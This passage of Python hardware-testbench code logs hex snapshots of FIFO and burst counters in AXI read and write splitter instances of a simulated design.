logs.log_info("SNP %x tb.dut.split12.axi_wr_4_splitter.back_bid_d_fifo.count" % logs.peek("tb.dut.split12.axi_wr_4_splitter.back_bid_d_fifo.count"))
logs.log_info("SNP %x tb.dut.split12.axi_wr_4_splitter.back_bid_d_fifo.int_count" % logs.peek("tb.dut.split12.axi_wr_4_splitter.back_bid_d_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split12.axi_wr_4_splitter.order_fifo.next_count" % logs.peek("tb.dut.split12.axi_wr_4_splitter.order_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split12.axi_wr_4_splitter.order_fifo.count" % logs.peek("tb.dut.split12.axi_wr_4_splitter.order_fifo.count"))
logs.log_info("SNP %x tb.dut.split12.axi_wr_4_splitter.w_fifo.next_count" % logs.peek("tb.dut.split12.axi_wr_4_splitter.w_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split12.axi_wr_4_splitter.w_fifo.count" % logs.peek("tb.dut.split12.axi_wr_4_splitter.w_fifo.count"))
logs.log_info("SNP %x tb.dut.split13.axi_rd_4_splitter.ar_fifo.next_count" % logs.peek("tb.dut.split13.axi_rd_4_splitter.ar_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split13.axi_rd_4_splitter.ar_fifo.count" % logs.peek("tb.dut.split13.axi_rd_4_splitter.ar_fifo.count"))
logs.log_info("SNP %x tb.dut.split13.axi_rd_4_splitter.r_fifo.next_count" % logs.peek("tb.dut.split13.axi_rd_4_splitter.r_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split13.axi_rd_4_splitter.r_fifo.count" % logs.peek("tb.dut.split13.axi_rd_4_splitter.r_fifo.count"))
logs.log_info("SNP %x tb.dut.split13.axi_wr_4_splitter.a_bcount" % logs.peek("tb.dut.split13.axi_wr_4_splitter.a_bcount"))
logs.log_info("SNP %x tb.dut.split13.axi_wr_4_splitter.b_bcount" % logs.peek("tb.dut.split13.axi_wr_4_splitter.b_bcount"))
logs.log_info("SNP %x tb.dut.split13.axi_wr_4_splitter.c_bcount" % logs.peek("tb.dut.split13.axi_wr_4_splitter.c_bcount"))
logs.log_info("SNP %x tb.dut.split13.axi_wr_4_splitter.d_bcount" % logs.peek("tb.dut.split13.axi_wr_4_splitter.d_bcount"))
logs.log_info("SNP %x tb.dut.split13.axi_wr_4_splitter.aw_fifo.next_count" % logs.peek("tb.dut.split13.axi_wr_4_splitter.aw_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split13.axi_wr_4_splitter.aw_fifo.count" % logs.peek("tb.dut.split13.axi_wr_4_splitter.aw_fifo.count"))
logs.log_info("SNP %x tb.dut.split13.axi_wr_4_splitter.b_fifo.next_count" % logs.peek("tb.dut.split13.axi_wr_4_splitter.b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split13.axi_wr_4_splitter.b_fifo.count" % logs.peek("tb.dut.split13.axi_wr_4_splitter.b_fifo.count"))
logs.log_info("SNP %x tb.dut.split13.axi_wr_4_splitter.back_bid_a_fifo.count" % logs.peek("tb.dut.split13.axi_wr_4_splitter.back_bid_a_fifo.count"))
logs.log_info("SNP %x tb.dut.split13.axi_wr_4_splitter.back_bid_a_fifo.int_count" % logs.peek("tb.dut.split13.axi_wr_4_splitter.back_bid_a_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split13.axi_wr_4_splitter.back_bid_b_fifo.count" % logs.peek("tb.dut.split13.axi_wr_4_splitter.back_bid_b_fifo.count"))
logs.log_info("SNP %x tb.dut.split13.axi_wr_4_splitter.back_bid_b_fifo.int_count" % logs.peek("tb.dut.split13.axi_wr_4_splitter.back_bid_b_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split13.axi_wr_4_splitter.back_bid_c_fifo.count" % logs.peek("tb.dut.split13.axi_wr_4_splitter.back_bid_c_fifo.count"))
logs.log_info("SNP %x tb.dut.split13.axi_wr_4_splitter.back_bid_c_fifo.int_count" % logs.peek("tb.dut.split13.axi_wr_4_splitter.back_bid_c_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split13.axi_wr_4_splitter.back_bid_d_fifo.count" % logs.peek("tb.dut.split13.axi_wr_4_splitter.back_bid_d_fifo.count"))
logs.log_info("SNP %x tb.dut.split13.axi_wr_4_splitter.back_bid_d_fifo.int_count" % logs.peek("tb.dut.split13.axi_wr_4_splitter.back_bid_d_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split13.axi_wr_4_splitter.order_fifo.next_count" % logs.peek("tb.dut.split13.axi_wr_4_splitter.order_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split13.axi_wr_4_splitter.order_fifo.count" % logs.peek("tb.dut.split13.axi_wr_4_splitter.order_fifo.count"))
logs.log_info("SNP %x tb.dut.split13.axi_wr_4_splitter.w_fifo.next_count" % logs.peek("tb.dut.split13.axi_wr_4_splitter.w_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split13.axi_wr_4_splitter.w_fifo.count" % logs.peek("tb.dut.split13.axi_wr_4_splitter.w_fifo.count"))
logs.log_info("SNP %x tb.dut.split14.axi_rd_4_splitter.ar_fifo.next_count" % logs.peek("tb.dut.split14.axi_rd_4_splitter.ar_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split14.axi_rd_4_splitter.ar_fifo.count" % logs.peek("tb.dut.split14.axi_rd_4_splitter.ar_fifo.count"))
logs.log_info("SNP %x tb.dut.split14.axi_rd_4_splitter.r_fifo.next_count" % logs.peek("tb.dut.split14.axi_rd_4_splitter.r_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split14.axi_rd_4_splitter.r_fifo.count" % logs.peek("tb.dut.split14.axi_rd_4_splitter.r_fifo.count"))
logs.log_info("SNP %x tb.dut.split14.axi_wr_4_splitter.a_bcount" % logs.peek("tb.dut.split14.axi_wr_4_splitter.a_bcount"))
logs.log_info("SNP %x tb.dut.split14.axi_wr_4_splitter.b_bcount" % logs.peek("tb.dut.split14.axi_wr_4_splitter.b_bcount"))
logs.log_info("SNP %x tb.dut.split14.axi_wr_4_splitter.c_bcount" % logs.peek("tb.dut.split14.axi_wr_4_splitter.c_bcount"))
logs.log_info("SNP %x tb.dut.split14.axi_wr_4_splitter.d_bcount" % logs.peek("tb.dut.split14.axi_wr_4_splitter.d_bcount"))
logs.log_info("SNP %x tb.dut.split14.axi_wr_4_splitter.aw_fifo.next_count" % logs.peek("tb.dut.split14.axi_wr_4_splitter.aw_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split14.axi_wr_4_splitter.aw_fifo.count" % logs.peek("tb.dut.split14.axi_wr_4_splitter.aw_fifo.count"))
logs.log_info("SNP %x tb.dut.split14.axi_wr_4_splitter.b_fifo.next_count" % logs.peek("tb.dut.split14.axi_wr_4_splitter.b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split14.axi_wr_4_splitter.b_fifo.count" % logs.peek("tb.dut.split14.axi_wr_4_splitter.b_fifo.count"))
logs.log_info("SNP %x tb.dut.split14.axi_wr_4_splitter.back_bid_a_fifo.count" % logs.peek("tb.dut.split14.axi_wr_4_splitter.back_bid_a_fifo.count"))
logs.log_info("SNP %x tb.dut.split14.axi_wr_4_splitter.back_bid_a_fifo.int_count" % logs.peek("tb.dut.split14.axi_wr_4_splitter.back_bid_a_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split14.axi_wr_4_splitter.back_bid_b_fifo.count" % logs.peek("tb.dut.split14.axi_wr_4_splitter.back_bid_b_fifo.count"))
logs.log_info("SNP %x tb.dut.split14.axi_wr_4_splitter.back_bid_b_fifo.int_count" % logs.peek("tb.dut.split14.axi_wr_4_splitter.back_bid_b_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split14.axi_wr_4_splitter.back_bid_c_fifo.count" % logs.peek("tb.dut.split14.axi_wr_4_splitter.back_bid_c_fifo.count"))
logs.log_info("SNP %x tb.dut.split14.axi_wr_4_splitter.back_bid_c_fifo.int_count" % logs.peek("tb.dut.split14.axi_wr_4_splitter.back_bid_c_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split14.axi_wr_4_splitter.back_bid_d_fifo.count" % logs.peek("tb.dut.split14.axi_wr_4_splitter.back_bid_d_fifo.count"))
logs.log_info("SNP %x tb.dut.split14.axi_wr_4_splitter.back_bid_d_fifo.int_count" % logs.peek("tb.dut.split14.axi_wr_4_splitter.back_bid_d_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split14.axi_wr_4_splitter.order_fifo.next_count" % logs.peek("tb.dut.split14.axi_wr_4_splitter.order_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split14.axi_wr_4_splitter.order_fifo.count" % logs.peek("tb.dut.split14.axi_wr_4_splitter.order_fifo.count"))
logs.log_info("SNP %x tb.dut.split14.axi_wr_4_splitter.w_fifo.next_count" % logs.peek("tb.dut.split14.axi_wr_4_splitter.w_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split14.axi_wr_4_splitter.w_fifo.count" % logs.peek("tb.dut.split14.axi_wr_4_splitter.w_fifo.count"))
logs.log_info("SNP %x tb.dut.split15.axi_rd_4_splitter.ar_fifo.next_count" % logs.peek("tb.dut.split15.axi_rd_4_splitter.ar_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split15.axi_rd_4_splitter.ar_fifo.count" % logs.peek("tb.dut.split15.axi_rd_4_splitter.ar_fifo.count"))
logs.log_info("SNP %x tb.dut.split15.axi_rd_4_splitter.r_fifo.next_count" % logs.peek("tb.dut.split15.axi_rd_4_splitter.r_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split15.axi_rd_4_splitter.r_fifo.count" % logs.peek("tb.dut.split15.axi_rd_4_splitter.r_fifo.count"))
logs.log_info("SNP %x tb.dut.split15.axi_wr_4_splitter.a_bcount" % logs.peek("tb.dut.split15.axi_wr_4_splitter.a_bcount"))
logs.log_info("SNP %x tb.dut.split15.axi_wr_4_splitter.b_bcount" % logs.peek("tb.dut.split15.axi_wr_4_splitter.b_bcount"))
logs.log_info("SNP %x tb.dut.split15.axi_wr_4_splitter.c_bcount" % logs.peek("tb.dut.split15.axi_wr_4_splitter.c_bcount"))
logs.log_info("SNP %x tb.dut.split15.axi_wr_4_splitter.d_bcount" % logs.peek("tb.dut.split15.axi_wr_4_splitter.d_bcount"))
logs.log_info("SNP %x tb.dut.split15.axi_wr_4_splitter.aw_fifo.next_count" % logs.peek("tb.dut.split15.axi_wr_4_splitter.aw_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split15.axi_wr_4_splitter.aw_fifo.count" % logs.peek("tb.dut.split15.axi_wr_4_splitter.aw_fifo.count"))
logs.log_info("SNP %x tb.dut.split15.axi_wr_4_splitter.b_fifo.next_count" % logs.peek("tb.dut.split15.axi_wr_4_splitter.b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split15.axi_wr_4_splitter.b_fifo.count" % logs.peek("tb.dut.split15.axi_wr_4_splitter.b_fifo.count"))
logs.log_info("SNP %x tb.dut.split15.axi_wr_4_splitter.back_bid_a_fifo.count" % logs.peek("tb.dut.split15.axi_wr_4_splitter.back_bid_a_fifo.count"))
logs.log_info("SNP %x tb.dut.split15.axi_wr_4_splitter.back_bid_a_fifo.int_count" % logs.peek("tb.dut.split15.axi_wr_4_splitter.back_bid_a_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split15.axi_wr_4_splitter.back_bid_b_fifo.count" % logs.peek("tb.dut.split15.axi_wr_4_splitter.back_bid_b_fifo.count"))
logs.log_info("SNP %x tb.dut.split15.axi_wr_4_splitter.back_bid_b_fifo.int_count" % logs.peek("tb.dut.split15.axi_wr_4_splitter.back_bid_b_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split15.axi_wr_4_splitter.back_bid_c_fifo.count" % logs.peek("tb.dut.split15.axi_wr_4_splitter.back_bid_c_fifo.count"))
logs.log_info("SNP %x tb.dut.split15.axi_wr_4_splitter.back_bid_c_fifo.int_count" % logs.peek("tb.dut.split15.axi_wr_4_splitter.back_bid_c_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split15.axi_wr_4_splitter.back_bid_d_fifo.count" % logs.peek("tb.dut.split15.axi_wr_4_splitter.back_bid_d_fifo.count"))
logs.log_info("SNP %x tb.dut.split15.axi_wr_4_splitter.back_bid_d_fifo.int_count" % logs.peek("tb.dut.split15.axi_wr_4_splitter.back_bid_d_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split15.axi_wr_4_splitter.order_fifo.next_count" % logs.peek("tb.dut.split15.axi_wr_4_splitter.order_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split15.axi_wr_4_splitter.order_fifo.count" % logs.peek("tb.dut.split15.axi_wr_4_splitter.order_fifo.count"))
logs.log_info("SNP %x tb.dut.split15.axi_wr_4_splitter.w_fifo.next_count" % logs.peek("tb.dut.split15.axi_wr_4_splitter.w_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split15.axi_wr_4_splitter.w_fifo.count" % logs.peek("tb.dut.split15.axi_wr_4_splitter.w_fifo.count"))
logs.log_info("SNP %x tb.dut.split2.axi_rd_4_splitter.ar_fifo.next_count" % logs.peek("tb.dut.split2.axi_rd_4_splitter.ar_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split2.axi_rd_4_splitter.ar_fifo.count" % logs.peek("tb.dut.split2.axi_rd_4_splitter.ar_fifo.count"))
logs.log_info("SNP %x tb.dut.split2.axi_rd_4_splitter.r_fifo.next_count" % logs.peek("tb.dut.split2.axi_rd_4_splitter.r_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split2.axi_rd_4_splitter.r_fifo.count" % logs.peek("tb.dut.split2.axi_rd_4_splitter.r_fifo.count"))
logs.log_info("SNP %x tb.dut.split2.axi_wr_4_splitter.a_bcount" % logs.peek("tb.dut.split2.axi_wr_4_splitter.a_bcount"))
logs.log_info("SNP %x tb.dut.split2.axi_wr_4_splitter.b_bcount" % logs.peek("tb.dut.split2.axi_wr_4_splitter.b_bcount"))
logs.log_info("SNP %x tb.dut.split2.axi_wr_4_splitter.c_bcount" % logs.peek("tb.dut.split2.axi_wr_4_splitter.c_bcount"))
logs.log_info("SNP %x tb.dut.split2.axi_wr_4_splitter.d_bcount" % logs.peek("tb.dut.split2.axi_wr_4_splitter.d_bcount"))
logs.log_info("SNP %x tb.dut.split2.axi_wr_4_splitter.aw_fifo.next_count" % logs.peek("tb.dut.split2.axi_wr_4_splitter.aw_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split2.axi_wr_4_splitter.aw_fifo.count" % logs.peek("tb.dut.split2.axi_wr_4_splitter.aw_fifo.count"))
logs.log_info("SNP %x tb.dut.split2.axi_wr_4_splitter.b_fifo.next_count" % logs.peek("tb.dut.split2.axi_wr_4_splitter.b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split2.axi_wr_4_splitter.b_fifo.count" % logs.peek("tb.dut.split2.axi_wr_4_splitter.b_fifo.count"))
logs.log_info("SNP %x tb.dut.split2.axi_wr_4_splitter.back_bid_a_fifo.count" % logs.peek("tb.dut.split2.axi_wr_4_splitter.back_bid_a_fifo.count"))
logs.log_info("SNP %x tb.dut.split2.axi_wr_4_splitter.back_bid_a_fifo.int_count" % logs.peek("tb.dut.split2.axi_wr_4_splitter.back_bid_a_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split2.axi_wr_4_splitter.back_bid_b_fifo.count" % logs.peek("tb.dut.split2.axi_wr_4_splitter.back_bid_b_fifo.count"))
logs.log_info("SNP %x tb.dut.split2.axi_wr_4_splitter.back_bid_b_fifo.int_count" % logs.peek("tb.dut.split2.axi_wr_4_splitter.back_bid_b_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split2.axi_wr_4_splitter.back_bid_c_fifo.count" % logs.peek("tb.dut.split2.axi_wr_4_splitter.back_bid_c_fifo.count"))
logs.log_info("SNP %x tb.dut.split2.axi_wr_4_splitter.back_bid_c_fifo.int_count" % logs.peek("tb.dut.split2.axi_wr_4_splitter.back_bid_c_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split2.axi_wr_4_splitter.back_bid_d_fifo.count" % logs.peek("tb.dut.split2.axi_wr_4_splitter.back_bid_d_fifo.count"))
logs.log_info("SNP %x tb.dut.split2.axi_wr_4_splitter.back_bid_d_fifo.int_count" % logs.peek("tb.dut.split2.axi_wr_4_splitter.back_bid_d_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split2.axi_wr_4_splitter.order_fifo.next_count" % logs.peek("tb.dut.split2.axi_wr_4_splitter.order_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split2.axi_wr_4_splitter.order_fifo.count" % logs.peek("tb.dut.split2.axi_wr_4_splitter.order_fifo.count"))
logs.log_info("SNP %x tb.dut.split2.axi_wr_4_splitter.w_fifo.next_count" % logs.peek("tb.dut.split2.axi_wr_4_splitter.w_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split2.axi_wr_4_splitter.w_fifo.count" % logs.peek("tb.dut.split2.axi_wr_4_splitter.w_fifo.count"))
logs.log_info("SNP %x tb.dut.split3.axi_rd_4_splitter.ar_fifo.next_count" % logs.peek("tb.dut.split3.axi_rd_4_splitter.ar_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split3.axi_rd_4_splitter.ar_fifo.count" % logs.peek("tb.dut.split3.axi_rd_4_splitter.ar_fifo.count"))
logs.log_info("SNP %x tb.dut.split3.axi_rd_4_splitter.r_fifo.next_count" % logs.peek("tb.dut.split3.axi_rd_4_splitter.r_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split3.axi_rd_4_splitter.r_fifo.count" % logs.peek("tb.dut.split3.axi_rd_4_splitter.r_fifo.count"))
logs.log_info("SNP %x tb.dut.split3.axi_wr_4_splitter.a_bcount" % logs.peek("tb.dut.split3.axi_wr_4_splitter.a_bcount"))
logs.log_info("SNP %x tb.dut.split3.axi_wr_4_splitter.b_bcount" % logs.peek("tb.dut.split3.axi_wr_4_splitter.b_bcount"))
logs.log_info("SNP %x tb.dut.split3.axi_wr_4_splitter.c_bcount" % logs.peek("tb.dut.split3.axi_wr_4_splitter.c_bcount"))
logs.log_info("SNP %x tb.dut.split3.axi_wr_4_splitter.d_bcount" % logs.peek("tb.dut.split3.axi_wr_4_splitter.d_bcount"))
logs.log_info("SNP %x tb.dut.split3.axi_wr_4_splitter.aw_fifo.next_count" % logs.peek("tb.dut.split3.axi_wr_4_splitter.aw_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split3.axi_wr_4_splitter.aw_fifo.count" % logs.peek("tb.dut.split3.axi_wr_4_splitter.aw_fifo.count"))
logs.log_info("SNP %x tb.dut.split3.axi_wr_4_splitter.b_fifo.next_count" % logs.peek("tb.dut.split3.axi_wr_4_splitter.b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split3.axi_wr_4_splitter.b_fifo.count" % logs.peek("tb.dut.split3.axi_wr_4_splitter.b_fifo.count"))
logs.log_info("SNP %x tb.dut.split3.axi_wr_4_splitter.back_bid_a_fifo.count" % logs.peek("tb.dut.split3.axi_wr_4_splitter.back_bid_a_fifo.count"))
logs.log_info("SNP %x tb.dut.split3.axi_wr_4_splitter.back_bid_a_fifo.int_count" % logs.peek("tb.dut.split3.axi_wr_4_splitter.back_bid_a_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split3.axi_wr_4_splitter.back_bid_b_fifo.count" % logs.peek("tb.dut.split3.axi_wr_4_splitter.back_bid_b_fifo.count"))
logs.log_info("SNP %x tb.dut.split3.axi_wr_4_splitter.back_bid_b_fifo.int_count" % logs.peek("tb.dut.split3.axi_wr_4_splitter.back_bid_b_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split3.axi_wr_4_splitter.back_bid_c_fifo.count" % logs.peek("tb.dut.split3.axi_wr_4_splitter.back_bid_c_fifo.count"))
logs.log_info("SNP %x tb.dut.split3.axi_wr_4_splitter.back_bid_c_fifo.int_count" % logs.peek("tb.dut.split3.axi_wr_4_splitter.back_bid_c_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split3.axi_wr_4_splitter.back_bid_d_fifo.count" % logs.peek("tb.dut.split3.axi_wr_4_splitter.back_bid_d_fifo.count"))
logs.log_info("SNP %x tb.dut.split3.axi_wr_4_splitter.back_bid_d_fifo.int_count" % logs.peek("tb.dut.split3.axi_wr_4_splitter.back_bid_d_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split3.axi_wr_4_splitter.order_fifo.next_count" % logs.peek("tb.dut.split3.axi_wr_4_splitter.order_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split3.axi_wr_4_splitter.order_fifo.count" % logs.peek("tb.dut.split3.axi_wr_4_splitter.order_fifo.count"))
logs.log_info("SNP %x tb.dut.split3.axi_wr_4_splitter.w_fifo.next_count" % logs.peek("tb.dut.split3.axi_wr_4_splitter.w_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split3.axi_wr_4_splitter.w_fifo.count" % logs.peek("tb.dut.split3.axi_wr_4_splitter.w_fifo.count"))
logs.log_info("SNP %x tb.dut.split4.axi_rd_4_splitter.ar_fifo.next_count" % logs.peek("tb.dut.split4.axi_rd_4_splitter.ar_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split4.axi_rd_4_splitter.ar_fifo.count" % logs.peek("tb.dut.split4.axi_rd_4_splitter.ar_fifo.count"))
logs.log_info("SNP %x tb.dut.split4.axi_rd_4_splitter.r_fifo.next_count" % logs.peek("tb.dut.split4.axi_rd_4_splitter.r_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split4.axi_rd_4_splitter.r_fifo.count" % logs.peek("tb.dut.split4.axi_rd_4_splitter.r_fifo.count"))
logs.log_info("SNP %x tb.dut.split4.axi_wr_4_splitter.a_bcount" % logs.peek("tb.dut.split4.axi_wr_4_splitter.a_bcount"))
logs.log_info("SNP %x tb.dut.split4.axi_wr_4_splitter.b_bcount" % logs.peek("tb.dut.split4.axi_wr_4_splitter.b_bcount"))
logs.log_info("SNP %x tb.dut.split4.axi_wr_4_splitter.c_bcount" % logs.peek("tb.dut.split4.axi_wr_4_splitter.c_bcount"))
logs.log_info("SNP %x tb.dut.split4.axi_wr_4_splitter.d_bcount" % logs.peek("tb.dut.split4.axi_wr_4_splitter.d_bcount"))
logs.log_info("SNP %x tb.dut.split4.axi_wr_4_splitter.aw_fifo.next_count" % logs.peek("tb.dut.split4.axi_wr_4_splitter.aw_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split4.axi_wr_4_splitter.aw_fifo.count" % logs.peek("tb.dut.split4.axi_wr_4_splitter.aw_fifo.count"))
logs.log_info("SNP %x tb.dut.split4.axi_wr_4_splitter.b_fifo.next_count" % logs.peek("tb.dut.split4.axi_wr_4_splitter.b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split4.axi_wr_4_splitter.b_fifo.count" % logs.peek("tb.dut.split4.axi_wr_4_splitter.b_fifo.count"))
logs.log_info("SNP %x tb.dut.split4.axi_wr_4_splitter.back_bid_a_fifo.count" % logs.peek("tb.dut.split4.axi_wr_4_splitter.back_bid_a_fifo.count"))
logs.log_info("SNP %x tb.dut.split4.axi_wr_4_splitter.back_bid_a_fifo.int_count" % logs.peek("tb.dut.split4.axi_wr_4_splitter.back_bid_a_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split4.axi_wr_4_splitter.back_bid_b_fifo.count" % logs.peek("tb.dut.split4.axi_wr_4_splitter.back_bid_b_fifo.count"))
logs.log_info("SNP %x tb.dut.split4.axi_wr_4_splitter.back_bid_b_fifo.int_count" % logs.peek("tb.dut.split4.axi_wr_4_splitter.back_bid_b_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split4.axi_wr_4_splitter.back_bid_c_fifo.count" % logs.peek("tb.dut.split4.axi_wr_4_splitter.back_bid_c_fifo.count"))
logs.log_info("SNP %x tb.dut.split4.axi_wr_4_splitter.back_bid_c_fifo.int_count" % logs.peek("tb.dut.split4.axi_wr_4_splitter.back_bid_c_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split4.axi_wr_4_splitter.back_bid_d_fifo.count" % logs.peek("tb.dut.split4.axi_wr_4_splitter.back_bid_d_fifo.count"))
logs.log_info("SNP %x tb.dut.split4.axi_wr_4_splitter.back_bid_d_fifo.int_count" % logs.peek("tb.dut.split4.axi_wr_4_splitter.back_bid_d_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split4.axi_wr_4_splitter.order_fifo.next_count" % logs.peek("tb.dut.split4.axi_wr_4_splitter.order_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split4.axi_wr_4_splitter.order_fifo.count" % logs.peek("tb.dut.split4.axi_wr_4_splitter.order_fifo.count"))
logs.log_info("SNP %x tb.dut.split4.axi_wr_4_splitter.w_fifo.next_count" % logs.peek("tb.dut.split4.axi_wr_4_splitter.w_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split4.axi_wr_4_splitter.w_fifo.count" % logs.peek("tb.dut.split4.axi_wr_4_splitter.w_fifo.count"))
logs.log_info("SNP %x tb.dut.split5.axi_rd_4_splitter.ar_fifo.next_count" % logs.peek("tb.dut.split5.axi_rd_4_splitter.ar_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split5.axi_rd_4_splitter.ar_fifo.count" % logs.peek("tb.dut.split5.axi_rd_4_splitter.ar_fifo.count"))
logs.log_info("SNP %x tb.dut.split5.axi_rd_4_splitter.r_fifo.next_count" % logs.peek("tb.dut.split5.axi_rd_4_splitter.r_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split5.axi_rd_4_splitter.r_fifo.count" % logs.peek("tb.dut.split5.axi_rd_4_splitter.r_fifo.count"))
logs.log_info("SNP %x tb.dut.split5.axi_wr_4_splitter.a_bcount" % logs.peek("tb.dut.split5.axi_wr_4_splitter.a_bcount"))
logs.log_info("SNP %x tb.dut.split5.axi_wr_4_splitter.b_bcount" % logs.peek("tb.dut.split5.axi_wr_4_splitter.b_bcount"))
logs.log_info("SNP %x tb.dut.split5.axi_wr_4_splitter.c_bcount" % logs.peek("tb.dut.split5.axi_wr_4_splitter.c_bcount"))
logs.log_info("SNP %x tb.dut.split5.axi_wr_4_splitter.d_bcount" % logs.peek("tb.dut.split5.axi_wr_4_splitter.d_bcount"))
logs.log_info("SNP %x tb.dut.split5.axi_wr_4_splitter.aw_fifo.next_count" % logs.peek("tb.dut.split5.axi_wr_4_splitter.aw_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split5.axi_wr_4_splitter.aw_fifo.count" % logs.peek("tb.dut.split5.axi_wr_4_splitter.aw_fifo.count"))
logs.log_info("SNP %x tb.dut.split5.axi_wr_4_splitter.b_fifo.next_count" % logs.peek("tb.dut.split5.axi_wr_4_splitter.b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split5.axi_wr_4_splitter.b_fifo.count" % logs.peek("tb.dut.split5.axi_wr_4_splitter.b_fifo.count"))
logs.log_info("SNP %x tb.dut.split5.axi_wr_4_splitter.back_bid_a_fifo.count" % logs.peek("tb.dut.split5.axi_wr_4_splitter.back_bid_a_fifo.count"))
logs.log_info("SNP %x tb.dut.split5.axi_wr_4_splitter.back_bid_a_fifo.int_count" % logs.peek("tb.dut.split5.axi_wr_4_splitter.back_bid_a_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split5.axi_wr_4_splitter.back_bid_b_fifo.count" % logs.peek("tb.dut.split5.axi_wr_4_splitter.back_bid_b_fifo.count"))
logs.log_info("SNP %x tb.dut.split5.axi_wr_4_splitter.back_bid_b_fifo.int_count" % logs.peek("tb.dut.split5.axi_wr_4_splitter.back_bid_b_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split5.axi_wr_4_splitter.back_bid_c_fifo.count" % logs.peek("tb.dut.split5.axi_wr_4_splitter.back_bid_c_fifo.count"))
logs.log_info("SNP %x tb.dut.split5.axi_wr_4_splitter.back_bid_c_fifo.int_count" % logs.peek("tb.dut.split5.axi_wr_4_splitter.back_bid_c_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split5.axi_wr_4_splitter.back_bid_d_fifo.count" % logs.peek("tb.dut.split5.axi_wr_4_splitter.back_bid_d_fifo.count"))
logs.log_info("SNP %x tb.dut.split5.axi_wr_4_splitter.back_bid_d_fifo.int_count" % logs.peek("tb.dut.split5.axi_wr_4_splitter.back_bid_d_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split5.axi_wr_4_splitter.order_fifo.next_count" % logs.peek("tb.dut.split5.axi_wr_4_splitter.order_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split5.axi_wr_4_splitter.order_fifo.count" % logs.peek("tb.dut.split5.axi_wr_4_splitter.order_fifo.count"))
logs.log_info("SNP %x tb.dut.split5.axi_wr_4_splitter.w_fifo.next_count" % logs.peek("tb.dut.split5.axi_wr_4_splitter.w_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split5.axi_wr_4_splitter.w_fifo.count" % logs.peek("tb.dut.split5.axi_wr_4_splitter.w_fifo.count"))
logs.log_info("SNP %x tb.dut.split6.axi_rd_4_splitter.ar_fifo.next_count" % logs.peek("tb.dut.split6.axi_rd_4_splitter.ar_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split6.axi_rd_4_splitter.ar_fifo.count" % logs.peek("tb.dut.split6.axi_rd_4_splitter.ar_fifo.count"))
logs.log_info("SNP %x tb.dut.split6.axi_rd_4_splitter.r_fifo.next_count" % logs.peek("tb.dut.split6.axi_rd_4_splitter.r_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split6.axi_rd_4_splitter.r_fifo.count" % logs.peek("tb.dut.split6.axi_rd_4_splitter.r_fifo.count"))
logs.log_info("SNP %x tb.dut.split6.axi_wr_4_splitter.a_bcount" % logs.peek("tb.dut.split6.axi_wr_4_splitter.a_bcount"))
